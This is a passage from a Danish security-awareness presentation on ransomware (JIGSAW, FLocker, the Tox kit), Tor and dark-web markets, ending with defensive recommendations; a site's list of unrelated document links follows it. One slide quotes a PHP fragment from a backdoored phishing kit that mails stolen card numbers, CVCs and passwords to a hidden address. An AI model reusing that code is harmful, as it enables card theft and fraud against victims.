are a research institution," she was quoted as saying. "We are conducting world class research daily and we don t know what we don t know in terms of who s been impacted and the last thing we want to do is lose someone s life s work." https://www.theguardian.com/technology/2016/feb/17/los-angeleshospital-hacked-ransom-bitcoin-hollywood-presbyterian-medical-center to-recover-crucial-data-held-hostage/

46 JIGSAW - locking and deleting files incrementally Reminiscent to the horror film Saw, this malware toys with users by locking and deleting their files incrementally To an extent, it instills fear and pressures users into paying the ransom. It even comes with an image of Saw s very own Billy the puppet, and the red digital clock to boot. Infection and distribution Based on our analysis, JIGSAW arrives as a file downloaded from a free cloud storage service named 1fichier[.]com. This service has previously hosted other malware like the information stealer FAREIT, as well as COINSTEALER, which gathers bitcoins. We already notified 1ficher about this incident and they already removed the said malicious URLs. It can also be downloaded at hxxp://waldorftrust[.]com, where JIGSAW is most probably bundled with a cryptominer software. The note introduces the idea of exponential growth, and applies it on the user s file and the ransom amount. Recent crypto-ransomware families have ransom amounts that grow as time passes, but not with the same increments as JIGSAW. To make matters worse, it deletes a larger amount of files with every hour while the amount to be paid also increases. JIGSAW deletes files and increases the ransom amount per hour. And with the exponential increase of files being permanently deleted, users may be pressured into paying the ransom so they may either save the remaining files, or avoid paying a larger ransom. The least amount the user can pay is US$

47

48 FLocker Mobile Ransomware Crosses to Smart TV FLocker aka. Frantic Locker, rammer Android (ANDROIDOS_FLOCKER.A) 7000 forskellige varianter siden den første gang blev set i maj 2015 Seneste udgave en Politi Trojan som anklager ofret for forbrydelser og vil have ofret til at betale USD200 i bøde via itunes gavekort Rammer både mobil devices og Android Smart TV Mobil devices Smart TV TV-virus låser skærmen og kræver løsepenge Mobilvirus er blevet ændret, så den nu også jager fladskærmsfjernsyn med Android, og der skal betales for at kunne se TV igen. Thomas Breinstrup / 15. juni 2016 Sommerens store TV-mareridt kan være på vej, når en virus pludselig melder på skærmen, at den har låst TV-apparatet, og at der ikke bliver mere hverken Tour de France eller fodbold, før der er betalt løsepenge. Det er IT-sikkerhedsfirmaet Trend Micro, der har opdaget en ny afart af en virus, som både kan bruges til at ramme mobiltelefoner og fladskærmsfjernsyn.»flocker«, som er forkortelsen for»frantic Locker«(Vild lås), har cirkuleret siden april sidste år men har hidtil jaget smartphonetelefoner med den nyeste udgave af Googles mobilstyresystem, Android. Men nu er virussen ifølge Trend Micro blevet udvidet, så den også vil kaste sig over de nye fladskærmsfjernsyn, der bruger Android som styresystem til sin såkaldte smart-tv-flade. Det er der flere og flere fjernsynsmærker, der gør, blandt andet Philips og Sony. Og det er velkendt, at hvor folk typisk beskytter deres PCer mod virus, tænker meget få på at beskytte deres telefon, TV eller andre dimser, der er koblet på internetforbindelsen. Bliver man ramt af Flocker, vil skærmen blive låst af virussen, og en besked dukker op med kravet om at få for 200 dollars gavekort til Apples netbutik itunes. Virussen er dog programmeret til ikke at slå til i en række østeuropæiske lande. Hvis den opdager, at mobiltelefon eller TV står i Kasakhstan,

49

50

51 TOR - Kombination af flere mixes Målsætning: Etablering af en infrastruktur, der ikke er sårbar over for trafikanalyse Koncept: Kombination af mixes og proxies Anvender public-key til etablering af forbindelser Anvender symmetriske nøgler til kommunikation Samme koncept som kendes fra SSL/TLS proxies Anvendelse af flere mixes for at sikre et varieret netværk Mixes (blandere) Modtager krypteret input fra forskellige afsendere De-kryptering og videresendelse sker tilfældigt En iagttager kan ikke se, hvilket output der svarer til hvilket input Blot en enkelt server fungerer korrekt og ikke er kompromitteret vil anonymiteten være i behold Ulempe: Dyr og langsom public key kryptering A B B C A C C B??? Umuligt at afgøre hvilken meddelelse der kommer fra hvilken afsender C A B A

52 Hvordan kommer man på Tor netværket?

53 What is the Dark Web used for? (2015) February March 2016 TOP 5

54

55

56

57 Guns, bullets and weapons

58 Booom?

59 Drugs

60 Need a Drivers license?

61 Stepstones and rooted servers

62 RDP, VNC, NX you name it.. Remote Desktop Access

63 Bots and Botnets Zeus Botnet for only $7.56

64 Access via proxy, socks, and to loaders and phishing..

65 The Dark Forums.

66 Hacking the hackers Inside many of the folders were files like css.gif and it was not an image!

67 Behind the codes - Hackers hacking hackers.. $zaz = PSW : $theaccountpw CardHolder : $chold CardNumber : $cnum ExpiryDate : $exp CVC : $cvv $subject = "RZ # $date # $time"; $headers = "From: VbV Full $headers.= $_POST[' Add']."\n"; mail($zaz,$subject,$log,$headers);

68 Virus maker kits for free (backdoored)

69 TOX Free Ransomware Toolkit Ransomware as a service.

70 TOX Free Ransomware Toolkit 'Tox' Offers Free build-your-own Ransomware Malware Toolkit. Tox is completely free to use. One dark web hacker has released this for anyone to download and set up their own ransomware for free. Tox, which runs on TOR, requires not much technical skills to use. It is designed in such a way that almost anyone can easily deploy ransomware in three simple steps. Once a user register with the site, follow these three simple steps to creating your own malware: Type a desired ransom amount you want to ask victims for. Provide an additional note in the "Cause", the message that will alert victims that they are being held hostage to a piece of malware. Finally, you are prompted to fill out a captcha, and click "Create". "This process creates an executable of about 2MB that is disguised as a.scr file. Then the Tox [users] distribute and install as they see fit. The Tox site (runs on the TOR network) will track the installs and profit. To withdraw funds, you need only supply a receiving Bitcoin address. - McAfee explains..

71 RaaS - Next generation Ransomware as a service

72 Cryptolocker/CTB-Locker/CryptoWall etc Bitcoins ~= DKK Kilde:

73 Cryptolocker/CTB-Locker/CryptoWall etc.. D a t e Countrys

74 Cryptolocker/CTB-Locker/CryptoWall etc.. Kilde:

75 Anbefalinger Forberedelse Awareness Basale kontroller Opdateringer Rettigheder Backup

76 Sandbox emuleret afvikling De indsamlede data kan afprøves i en sandbox for at verificere om de er skadelige. Vil afsløre exploits, download af yderligere malware og call back. Mistænkelig adfærd eller trafik bliver synlig. Virtual Analysis Win 7 Office10 Adobe 11 Win XP Office07 Adobe 10 Windows Server

77 Hvad kan vi gøre? - Praktiske anbefalinger (1) Sikkerhed i dybden: Anvend forskellige og overlappende sikkerhedsforanstaltninger, så der beskyttes med single-point-of-failure i enkelte foranstaltninger eller teknologier Basale kontroller: Hold fokus på basale kontroller husk den løbende opfølgning Overvågning: Mange organisationer opdager først brud på sikkerheden, når de får et opkald fra politiet eller en kunde. Overvågning af logfiler og change management kan give tidligere advarsel Antivirus er ikke nok: Antivirus fanger stadig mange angreb, men I oplever også mange angreb med unik malware og udnyttelse af dag-0-sårbarheder, som kræver andre værktøjer Endpointbeskyttelse: Endpoints skal beskyttes af mere end antivirus - husk opdateringer, begrænsede rettigheder, websikkerhed, device kontrol Patch straks: Angribere får ofte adgang ved hjælp af simple angrebsmetoder, som man kan beskytte sig mod med et opdateret og godt konfigureret it-miljø samt opdateret anti-virus Krypter følsomme data: Hvis data bliver tabt eller stjålet, er det meget sværere for en kriminel at misbruge Beskyt krypteringsnøgler: Hvis krypteringsnøglerne kompromitteres, kompromitteres sikkerheden også To-faktor-autentifikation: Dette vil ikke eliminere risikoen for, at passwords bliver stjålet, men det kan begrænse de skader, der kan ske ved misbrug af stjålne legitimationsoplysninger

78 Hvad kan vi gøre? - Praktiske anbefalinger (2) Mennesker: Awareness er stadig vigtigt. Undervis dine ansatte i vigtigheden af sikkerhed, hvordan man opdager et angreb, og hvad de skal gøre, når de ser noget mistænkeligt Hold adgangen til data på et need-to-know niveau: Begræns adgangen til systemerne til det nødvendige personale. Sørg for, at have processer på plads til at lukke for adgangen igen, når folk skifter rolle eller job Husk fysisk sikkerhed: Ikke alle datatyverier sker online. Kriminelle vil manipulere med computere, betalingsterminaler eller stjæle dokumenter Backup: Hvis alle andre foranstaltninger fejler, kan en backup redde data. Husk beskyttelse af backup medierne Incident response: Planlæg efter, at der vil ske hændelser - følg løbende op på hvordan, og hvor hurtigt, incidents opdages og håndteres, så reaktionen løbende kan forbedres Opfølgning: Glem ikke de basale kontroller. Hold fokus på bedre og hurtigere opdagelse gennem en blanding af mennesker, processer og teknologi Trusselsbilledet: Hold øje med trusselsbilledet for løbende at kunne tilpasse sikkerhedsløsningen. Husk at one-size fits all ikke holder i virkeligheden Riskovurdering: Er du mål for egentlig spionage, så undervurder ikke vedholdenheden, ekspertisen og værktøjerne hos din modstander

79 Tak!

Opdag avancerede angreb hurtigt så du kan agere på dem. Henrik Larsson, Senior Security Consultant, Dubex Vejlefjord den 21.

Opdag avancerede angreb hurtigt så du kan agere på dem. Henrik Larsson, Senior Security Consultant, Dubex Vejlefjord den 21. Opdag avancerede angreb hurtigt så du kan agere på dem Henrik Larsson, Senior Security Consultant, Dubex Vejlefjord den 21. maj 2015 DUBEX SECURITY & RISK MANAGEMENT UPDATE 2015 Opfølgning på praktiske

Læs mere

HACKERNE BLIVER BEDRE, SYSTEMERNE BLIVER MERE KOMPLEKSE OG PLATFORMENE FORSVINDER HAR VI TABT KAMPEN? MARTIN POVELSEN - KMD

HACKERNE BLIVER BEDRE, SYSTEMERNE BLIVER MERE KOMPLEKSE OG PLATFORMENE FORSVINDER HAR VI TABT KAMPEN? MARTIN POVELSEN - KMD HACKERNE BLIVER BEDRE, SYSTEMERNE BLIVER MERE KOMPLEKSE OG PLATFORMENE FORSVINDER HAR VI TABT KAMPEN? MARTIN POVELSEN - KMD HVILKEN BIL VIL DU HELST KØRE GALT I? Bemærk at brug og antal Bemærk at brug

Læs mere

Demonstration af et malware-angreb. Torben Nissen Ernst Tirsdag den 5. Oktober 2015

Demonstration af et malware-angreb. Torben Nissen Ernst Tirsdag den 5. Oktober 2015 Demonstration af et malware-angreb Torben Nissen Ernst Tirsdag den 5. Oktober 2015 : : Mobil +45 24 90 82 69 : E-mail tne@conscia.dk : Agenda Cisco 2015 Midyear Security Report Exploit kits - Angler og

Læs mere

Databeskyttelse: Afrunding. Jacob Herbst, CTO, Dubex A/S Dubex A/S, den 11. juni 2015

Databeskyttelse: Afrunding. Jacob Herbst, CTO, Dubex A/S Dubex A/S, den 11. juni 2015 Databeskyttelse: Afrunding Jacob Herbst, CTO, Dubex A/S Dubex A/S, den 11. juni 2015 Der er to typer virksomheder Der er to typer virksomheder: Dem, der ved at de er blevet hacket og dem der ikke ved at

Læs mere

Vores mange brugere på musskema.dk er rigtig gode til at komme med kvalificerede ønsker og behov.

Vores mange brugere på musskema.dk er rigtig gode til at komme med kvalificerede ønsker og behov. På dansk/in Danish: Aarhus d. 10. januar 2013/ the 10 th of January 2013 Kære alle Chefer i MUS-regi! Vores mange brugere på musskema.dk er rigtig gode til at komme med kvalificerede ønsker og behov. Og

Læs mere

Trolling Master Bornholm 2013

Trolling Master Bornholm 2013 Trolling Master Bornholm 2013 (English version further down) Tilmeldingen åbner om to uger Mandag den 3. december kl. 8.00 åbner tilmeldingen til Trolling Master Bornholm 2013. Vi har flere tilmeldinger

Læs mere

Status fra Sikkerhedsfronten. Jens Borup Pedersen DK-CERT/DeiC

Status fra Sikkerhedsfronten. Jens Borup Pedersen DK-CERT/DeiC Status fra Sikkerhedsfronten Jens Borup Pedersen DK-CERT/DeiC Status fra Sikkerhedsfronten Digitale trusselsbillede under forandring. Udgangspunkt i DK-CERTs aktiviteter. Tendenser lige nu,- hvad har drevet

Læs mere

Shooting tethered med Canon EOS-D i Capture One Pro. Shooting tethered i Capture One Pro 6.4 & 7.0 på MAC OS-X 10.7.5 & 10.8

Shooting tethered med Canon EOS-D i Capture One Pro. Shooting tethered i Capture One Pro 6.4 & 7.0 på MAC OS-X 10.7.5 & 10.8 Shooting tethered med Canon EOS-D i Capture One Pro Shooting tethered i Capture One Pro 6.4 & 7.0 på MAC OS-X 10.7.5 & 10.8 For Canon EOS-D ejere der fotograferer Shooting tethered med EOS-Utility eller

Læs mere

Financial Literacy among 5-7 years old children

Financial Literacy among 5-7 years old children Financial Literacy among 5-7 years old children -based on a market research survey among the parents in Denmark, Sweden, Norway, Finland, Northern Ireland and Republic of Ireland Page 1 Purpose of the

Læs mere

From innovation to market

From innovation to market Nupark Accelerace From innovation to market Public money Accelerace VC Private Equity Stock market Available capital BA 2 What is Nupark Accelerace Hands-on investment and business developmentprograms

Læs mere

APT & Advanced Threat Protection - i et dansk perspektiv. Peter Sindt 28. august 2014

APT & Advanced Threat Protection - i et dansk perspektiv. Peter Sindt 28. august 2014 APT & Advanced Threat Protection - i et dansk perspektiv Peter Sindt 28. august 2014 DAMAGE CAUSED Nye angreb nye tider 90 % af alle virksomheder har malware CRIMEWARE Intelligent Botnets Web Threats Targeted

Læs mere

Status på det trådløse netværk

Status på det trådløse netværk Status på det trådløse netværk Der er stadig problemer med det trådløse netværk, se status her: http://driftstatus.sdu.dk/?f=&antal=200&driftid=1671#1671 IT-service arbejder stadig med at løse problemerne

Læs mere

Design til digitale kommunikationsplatforme-f2013

Design til digitale kommunikationsplatforme-f2013 E-travellbook Design til digitale kommunikationsplatforme-f2013 ITU 22.05.2013 Dreamers Lana Grunwald - svetlana.grunwald@gmail.com Iya Murash-Millo - iyam@itu.dk Hiwa Mansurbeg - hiwm@itu.dk Jørgen K.

Læs mere

The River Underground, Additional Work

The River Underground, Additional Work 39 (104) The River Underground, Additional Work The River Underground Crosswords Across 1 Another word for "hard to cope with", "unendurable", "insufferable" (10) 5 Another word for "think", "believe",

Læs mere

The X Factor. Målgruppe. Læringsmål. Introduktion til læreren klasse & ungdomsuddannelser Engelskundervisningen

The X Factor. Målgruppe. Læringsmål. Introduktion til læreren klasse & ungdomsuddannelser Engelskundervisningen The X Factor Målgruppe 7-10 klasse & ungdomsuddannelser Engelskundervisningen Læringsmål Eleven kan give sammenhængende fremstillinger på basis af indhentede informationer Eleven har viden om at søge og

Læs mere

IPTV Box (MAG250/254) Bruger Manual

IPTV Box (MAG250/254) Bruger Manual IPTV Box (MAG250/254) Bruger Manual Når din STB (Set top Box) starter op, bliver der vist en pop up boks på skærmen, hvor du kan åbne EPG ved at trykke på F2 (Nogle bokse kan fortælle at den har brug for

Læs mere

Sådan får du styr på de digitale risici

Sådan får du styr på de digitale risici Sådan får du styr på de digitale risici Jacob Herbst, CTO, Dubex A/S Bygholm Park, Horsens, den 12. maj 2016 Udfordringer Avanceret infrastruktur og øget kompleksitet Compliance - ISO27001 og lovgivning

Læs mere

DET KONGELIGE BIBLIOTEK NATIONALBIBLIOTEK OG KØBENHAVNS UNIVERSITETS- BIBLIOTEK. Index

DET KONGELIGE BIBLIOTEK NATIONALBIBLIOTEK OG KØBENHAVNS UNIVERSITETS- BIBLIOTEK. Index DET KONGELIGE Index Download driver... 2 Find the Windows 7 version.... 2 Download the Windows Vista driver.... 4 Extract driver... 5 Windows Vista installation of a printer.... 7 Side 1 af 12 DET KONGELIGE

Læs mere

It-sikkerhedsstrategi i kommuner hvad giver mening at varetage internt og hvad kan outsources?

It-sikkerhedsstrategi i kommuner hvad giver mening at varetage internt og hvad kan outsources? It-sikkerhedsstrategi i kommuner hvad giver mening at varetage internt og hvad kan outsources? Klaus Kongsted, CRO, Dubex A/S Dubex A/S, den 5. maj 2015 Krav og udfordringer Avanceret infrastruktur og

Læs mere

Trolling Master Bornholm 2014

Trolling Master Bornholm 2014 Trolling Master Bornholm 2014 (English version further down) Så er ballet åbnet, 16,64 kg: Det er Kim Christiansen, som i mange år også har deltaget i TMB, der tirsdag landede denne laks. Den måler 120

Læs mere

Sport for the elderly

Sport for the elderly Sport for the elderly - Teenagers of the future Play the Game 2013 Aarhus, 29 October 2013 Ditte Toft Danish Institute for Sports Studies +45 3266 1037 ditte.toft@idan.dk A growing group in the population

Læs mere

VPN VEJLEDNING TIL MAC

VPN VEJLEDNING TIL MAC VPN VEJLEDNING TIL MAC MAC OS X 1 VPN VEJLEDNING TIL MAC Formålet med en VPN forbindelse er, at du kan tilgå nogle af Aarhus Universitets services hjemmefra, som ellers kun er tilgængelige, når du er på

Læs mere

Subject to terms and conditions. WEEK Type Price EUR WEEK Type Price EUR WEEK Type Price EUR WEEK Type Price EUR

Subject to terms and conditions. WEEK Type Price EUR WEEK Type Price EUR WEEK Type Price EUR WEEK Type Price EUR ITSO SERVICE OFFICE Weeks for Sale 31/05/2015 m: +34 636 277 307 w: clublasanta-timeshare.com e: roger@clublasanta.com See colour key sheet news: rogercls.blogspot.com Subject to terms and conditions THURSDAY

Læs mere

Engelsk. Niveau C. De Merkantile Erhvervsuddannelser September 2005. Casebaseret eksamen. www.jysk.dk og www.jysk.com.

Engelsk. Niveau C. De Merkantile Erhvervsuddannelser September 2005. Casebaseret eksamen. www.jysk.dk og www.jysk.com. 052430_EngelskC 08/09/05 13:29 Side 1 De Merkantile Erhvervsuddannelser September 2005 Side 1 af 4 sider Casebaseret eksamen Engelsk Niveau C www.jysk.dk og www.jysk.com Indhold: Opgave 1 Presentation

Læs mere

QUICK START Updated: 18. Febr. 2014

QUICK START Updated: 18. Febr. 2014 QUICK START Updated: 18. Febr. 2014 For at komme hurtigt og godt igang med dine nye Webstech produkter, anbefales at du downloader den senest opdaterede QuickStart fra vores hjemmeside: In order to get

Læs mere

Experience. Knowledge. Business. Across media and regions.

Experience. Knowledge. Business. Across media and regions. Experience. Knowledge. Business. Across media and regions. 1 SPOT Music. Film. Interactive. Velkommen. Program. - Introduktion - Formål og muligheder - Målgruppen - Udfordringerne vi har identificeret

Læs mere

Hvor er mine runde hjørner?

Hvor er mine runde hjørner? Hvor er mine runde hjørner? Ofte møder vi fortvivlelse blandt kunder, når de ser deres nye flotte site i deres browser og indser, at det ser anderledes ud, i forhold til det design, de godkendte i starten

Læs mere

Trolling Master Bornholm 2015

Trolling Master Bornholm 2015 Trolling Master Bornholm 2015 (English version further down) Panorama billede fra starten den første dag i 2014 Michael Koldtoft fra Trolling Centrum har brugt lidt tid på at arbejde med billederne fra

Læs mere

APT & Advanced Threat Protection - i et dansk perspektiv. Peter Sindt & Henrik Larsson Søborg, 7. november 2013

APT & Advanced Threat Protection - i et dansk perspektiv. Peter Sindt & Henrik Larsson Søborg, 7. november 2013 APT & Advanced Threat Protection - i et dansk perspektiv Peter Sindt & Henrik Larsson Søborg, 7. november 2013 DUBEX SECURITY & RISK MANAGEMENT SUMMIT 2013 Nye angreb nye tider 90 % af alle virksomheder

Læs mere

APT & Advanced Threat Protection - i et dansk perspektiv

APT & Advanced Threat Protection - i et dansk perspektiv APT & Advanced Threat Protection - i et dansk perspektiv Peter Sindt og Henrik Larsson Aarhus, den 8. maj 2014 DAMAGE CAUSED Nye angreb nye tider 90 % af alle virksomheder har malware CRIMEWARE Intelligent

Læs mere

Hackingens 5 faser. Kim Elgaard, Solution Engineer, Dubex A/S. 21. marts 2017

Hackingens 5 faser. Kim Elgaard, Solution Engineer, Dubex A/S. 21. marts 2017 Hackingens 5 faser Kim Elgaard, Solution Engineer, Dubex A/S 21. marts 2017 Agenda Angrebs vectorer Hackingens faser, samt beskyttelsen Hverdagseksempler Hvad kan vi gøre Praktiske anbefalinger Live demo

Læs mere

how to save excel as pdf

how to save excel as pdf 1 how to save excel as pdf This guide will show you how to save your Excel workbook as PDF files. Before you do so, you may want to copy several sheets from several documents into one document. To do so,

Læs mere

GUIDE TIL BREVSKRIVNING

GUIDE TIL BREVSKRIVNING GUIDE TIL BREVSKRIVNING APPELBREVE Formålet med at skrive et appelbrev er at få modtageren til at overholde menneskerettighederne. Det er en god idé at lægge vægt på modtagerens forpligtelser over for

Læs mere

Must I be a registered company in Denmark? That is not required. Both Danish and foreign companies can trade at Gaspoint Nordic.

Must I be a registered company in Denmark? That is not required. Both Danish and foreign companies can trade at Gaspoint Nordic. General Questions What kind of information do you need before I can start trading? Please visit our webpage www.gaspointnordic.com under the heading How to become a participant Is it possible to trade

Læs mere

Trolling Master Bornholm 2016 Nyhedsbrev nr. 8

Trolling Master Bornholm 2016 Nyhedsbrev nr. 8 Trolling Master Bornholm 2016 Nyhedsbrev nr. 8 English version further down Der bliver landet fisk men ikke mange Her er det Johnny Nielsen, Søløven, fra Tejn, som i denne uge fangede 13,0 kg nord for

Læs mere

Engelsk. Niveau D. De Merkantile Erhvervsuddannelser September Casebaseret eksamen. og

Engelsk. Niveau D. De Merkantile Erhvervsuddannelser September Casebaseret eksamen.  og 052431_EngelskD 08/09/05 13:29 Side 1 De Merkantile Erhvervsuddannelser September 2005 Side 1 af 4 sider Casebaseret eksamen Engelsk Niveau D www.jysk.dk og www.jysk.com Indhold: Opgave 1 Presentation

Læs mere

Nyhedsmail, december 2013 (scroll down for English version)

Nyhedsmail, december 2013 (scroll down for English version) Nyhedsmail, december 2013 (scroll down for English version) Kære Omdeler Julen venter rundt om hjørnet. Og netop julen er årsagen til, at NORDJYSKE Distributions mange omdelere har ekstra travlt med at

Læs mere

Trolling Master Bornholm 2014

Trolling Master Bornholm 2014 Trolling Master Bornholm 2014 (English version further down) Den ny havn i Tejn Havn Bornholms Regionskommune er gået i gang med at udvide Tejn Havn, og det er med til at gøre det muligt, at vi kan være

Læs mere

Vejledning til at tjekke om du har sat manuel IP på din computer.

Vejledning til at tjekke om du har sat manuel IP på din computer. Indhold Vejledning til at, komme på nettet. (DANSK)... 2 Gælder alle systemer.... 2 Vejledning til at tjekke om du har sat manuel IP på din computer.... 2 Windows 7... 2 Windows Vista... 2 Windows XP...

Læs mere

XV1100K(C)/XV1100SK(C)

XV1100K(C)/XV1100SK(C) Doro Gsm Mobiltelefon XV1100K(C)/XV1100SK(C) All rights reserverd. Any reprinting or unauthorized use wihout the written permission of Doro Gsm Mobiltelefon Corporation, is expressly prohibited. P/N LIT-11646-12-51

Læs mere

- Hvad er det, hvad gør det og hvordan kan du beskytte dig?

- Hvad er det, hvad gør det og hvordan kan du beskytte dig? - Hvad er det, hvad gør det og hvordan kan du beskytte dig? Ransomware - hvad er det? En guide udviklet af Draware A/S Ransomware er ikke et nyt fænomen. Det har faktisk eksisteret i over 30 år. Hvad der

Læs mere

DK - Quick Text Translation. HEYYER Net Promoter System Magento extension

DK - Quick Text Translation. HEYYER Net Promoter System Magento extension DK - Quick Text Translation HEYYER Net Promoter System Magento extension Version 1.0 15-11-2013 HEYYER / Email Templates Invitation Email Template Invitation Email English Dansk Title Invitation Email

Læs mere

Userguide. NN Markedsdata. for. Microsoft Dynamics CRM 2011. v. 1.0

Userguide. NN Markedsdata. for. Microsoft Dynamics CRM 2011. v. 1.0 Userguide NN Markedsdata for Microsoft Dynamics CRM 2011 v. 1.0 NN Markedsdata www. Introduction Navne & Numre Web Services for Microsoft Dynamics CRM hereafter termed NN-DynCRM enable integration to Microsoft

Læs mere

Trolling Master Bornholm 2016 Nyhedsbrev nr. 6

Trolling Master Bornholm 2016 Nyhedsbrev nr. 6 Trolling Master Bornholm 2016 Nyhedsbrev nr. 6 English version further down Johnny Nielsen med 8,6 kg laks Laksen blev fanget seks sømil ud for Tejn. Det var faktisk dobbelthug, så et kig ned i køletasken

Læs mere

Anmode om et tilbud: www.studioprime.hu og info@studioprime.hu Vi vil svare inden for 24 timer!

Anmode om et tilbud: www.studioprime.hu og info@studioprime.hu Vi vil svare inden for 24 timer! studioprime.hu produkter og services prisliste Gældende fra Jan. 11, 2015 til Feb. 28, 2015. Anmode om et tilbud: www.studioprime.hu og info@studioprime.hu Vi vil svare inden for 24 timer! Basic website

Læs mere

- Hvad er det, hvad gør det og hvordan kan du beskytte dig?

- Hvad er det, hvad gør det og hvordan kan du beskytte dig? - Hvad er det, hvad gør det og hvordan kan du beskytte dig? Ransomware, Hvad er det? En guide udviklet af Draware A/S Ransomware er ikke nyt. Det har faktisk eksisteret I over 30 år. Hvad DER ER NYT er

Læs mere

Terese B. Thomsen 1.semester Formidling, projektarbejde og webdesign ITU DMD d. 02/11-2012

Terese B. Thomsen 1.semester Formidling, projektarbejde og webdesign ITU DMD d. 02/11-2012 Server side Programming Wedesign Forelæsning #8 Recap PHP 1. Development Concept Design Coding Testing 2. Social Media Sharing, Images, Videos, Location etc Integrates with your websites 3. Widgets extend

Læs mere

Mobil Awareness 2011 CSIS Security Group

Mobil Awareness 2011 CSIS Security Group Mobil Awareness 2011 CSIS Security Group Peter Kruse (pkr@csis.dk) Head of CSIS ecrime and Research & Intelligence Unit PGP-ID: 0x715FB4BD Fingerprint: E1A6 7FA1 F11B 4CB5 E79F 1E14 EE9F 9ADB 715F B4BD

Læs mere

Trolling Master Bornholm 2016 Nyhedsbrev nr. 3

Trolling Master Bornholm 2016 Nyhedsbrev nr. 3 Trolling Master Bornholm 2016 Nyhedsbrev nr. 3 English version further down Den første dag i Bornholmerlaks konkurrencen Formanden for Bornholms Trollingklub, Anders Schou Jensen (og meddomer i TMB) fik

Læs mere

Help / Hjælp

Help / Hjælp Home page Lisa & Petur www.lisapetur.dk Help / Hjælp Help / Hjælp General The purpose of our Homepage is to allow external access to pictures and videos taken/made by the Gunnarsson family. The Association

Læs mere

Brug sømbrættet til at lave sjove figurer. Lav fx: Få de andre til at gætte, hvad du har lavet. Use the nail board to make funny shapes.

Brug sømbrættet til at lave sjove figurer. Lav fx: Få de andre til at gætte, hvad du har lavet. Use the nail board to make funny shapes. Brug sømbrættet til at lave sjove figurer. Lav f: Et dannebrogsflag Et hus med tag, vinduer og dør En fugl En bil En blomst Få de andre til at gætte, hvad du har lavet. Use the nail board to make funn

Læs mere

Trolling Master Bornholm 2016 Nyhedsbrev nr. 3

Trolling Master Bornholm 2016 Nyhedsbrev nr. 3 Trolling Master Bornholm 2016 Nyhedsbrev nr. 3 English version further down Fremragende vejr og laks hele vejen rundt om øen Weekendens fremragende vejr (se selv de bare arme) lokkede mange bornholmske

Læs mere

Konkrete anvisninger på en sikker og ansvarlig cloudinfrastruktur. v/jørgen Smed og Erik Borch Olsen, Komplex it

Konkrete anvisninger på en sikker og ansvarlig cloudinfrastruktur. v/jørgen Smed og Erik Borch Olsen, Komplex it Konkrete anvisninger på en sikker og ansvarlig cloudinfrastruktur v/jørgen Smed og Erik Borch Olsen, Komplex it Ransomware - Tager computeren eller data som gidsel Senior Konsulent Jørgen Smed Hvor slemt

Læs mere

Trolling Master Bornholm 2013

Trolling Master Bornholm 2013 Trolling Master Bornholm 2013 (English version further down) Tilmeldingerne til 2013 I dag nåede vi op på 77 tilmeldte både. Det er lidt lavere end samme tidspunkt sidste år. Til gengæld er det glædeligt,

Læs mere

JOHN LENNON (DANISH EDITION) BY CYNTHIA LENNON

JOHN LENNON (DANISH EDITION) BY CYNTHIA LENNON JOHN LENNON (DANISH EDITION) BY CYNTHIA LENNON READ ONLINE AND DOWNLOAD EBOOK : JOHN LENNON (DANISH EDITION) BY CYNTHIA LENNON Click button to download this ebook READ ONLINE AND DOWNLOAD JOHN LENNON (DANISH

Læs mere

Trolling Master Bornholm 2016 Nyhedsbrev nr. 7

Trolling Master Bornholm 2016 Nyhedsbrev nr. 7 Trolling Master Bornholm 2016 Nyhedsbrev nr. 7 English version further down Så var det omsider fiskevejr En af dem, der kom på vandet i en af hullerne, mellem den hårde vestenvind var Lejf K. Pedersen,

Læs mere

Webside score digitalenvelopes.

Webside score digitalenvelopes. Webside score digitalenvelopes.email Genereret November 01 2015 11:45 AM Scoren er 59/100 SEO Indhold Titel digitalenvelopes.email Encrypted Webmail Længde : 42 Perfekt, din titel indeholder mellem 10

Læs mere

Webside score futurehunter.net

Webside score futurehunter.net Webside score futurehunter.net Genereret Juni 02 2015 21:33 PM Scoren er 59/100 SEO Indhold Titel Always take higher ground Leadership comes through experience Længde : 63 Perfekt, din titel indeholder

Læs mere

Unitel EDI MT940 June 2010. Based on: SWIFT Standards - Category 9 MT940 Customer Statement Message (January 2004)

Unitel EDI MT940 June 2010. Based on: SWIFT Standards - Category 9 MT940 Customer Statement Message (January 2004) Unitel EDI MT940 June 2010 Based on: SWIFT Standards - Category 9 MT940 Customer Statement Message (January 2004) Contents 1. Introduction...3 2. General...3 3. Description of the MT940 message...3 3.1.

Læs mere

Appendix 1: Interview guide Maria og Kristian Lundgaard-Karlshøj, Ausumgaard

Appendix 1: Interview guide Maria og Kristian Lundgaard-Karlshøj, Ausumgaard Appendix 1: Interview guide Maria og Kristian Lundgaard-Karlshøj, Ausumgaard Fortæl om Ausumgaard s historie Der er hele tiden snak om værdier, men hvad er det for nogle værdier? uddyb forklar definer

Læs mere

Website review groweasy.dk

Website review groweasy.dk Website review groweasy.dk Generated on September 01 2016 10:32 AM The score is 56/100 SEO Content Title Webbureau Odense GrowEasy hjælper dig med digital markedsføring! Length : 66 Perfect, your title

Læs mere

Nyhedsmail, november 2013 (scroll down for English version)

Nyhedsmail, november 2013 (scroll down for English version) Nyhedsmail, november 2013 (scroll down for English version) Kære Omdeler Uret er stillet til vintertid, og antallet af lyse timer i døgnet er fortsat faldende. Vintermørket er kort sagt over os, og det

Læs mere

Aktivering af Survey funktionalitet

Aktivering af Survey funktionalitet Surveys i REDCap REDCap gør det muligt at eksponere ét eller flere instrumenter som et survey (spørgeskema) som derefter kan udfyldes direkte af patienten eller forsøgspersonen over internettet. Dette

Læs mere

Bilag. Resume. Side 1 af 12

Bilag. Resume. Side 1 af 12 Bilag Resume I denne opgave, lægges der fokus på unge og ensomhed gennem sociale medier. Vi har i denne opgave valgt at benytte Facebook som det sociale medie vi ligger fokus på, da det er det største

Læs mere

BACK-END OG DATA: ADMINISTRATION HVAD ER DE NYE MULIGHEDER MED VERSION 7.1? STEFFEN BILLE RANNES, 4. FEBRUAR 2015

BACK-END OG DATA: ADMINISTRATION HVAD ER DE NYE MULIGHEDER MED VERSION 7.1? STEFFEN BILLE RANNES, 4. FEBRUAR 2015 BACK-END OG DATA: ADMINISTRATION HVAD ER DE NYE MULIGHEDER MED VERSION 7.1? STEFFEN BILLE RANNES, 4. FEBRUAR 2015 SAS VISUAL ANALYTICS 7.1 ADMINISTRATOR Mulighed for at udføre handlinger på flere servere

Læs mere

Bookingmuligheder for professionelle brugere i Dansehallerne 2015-16

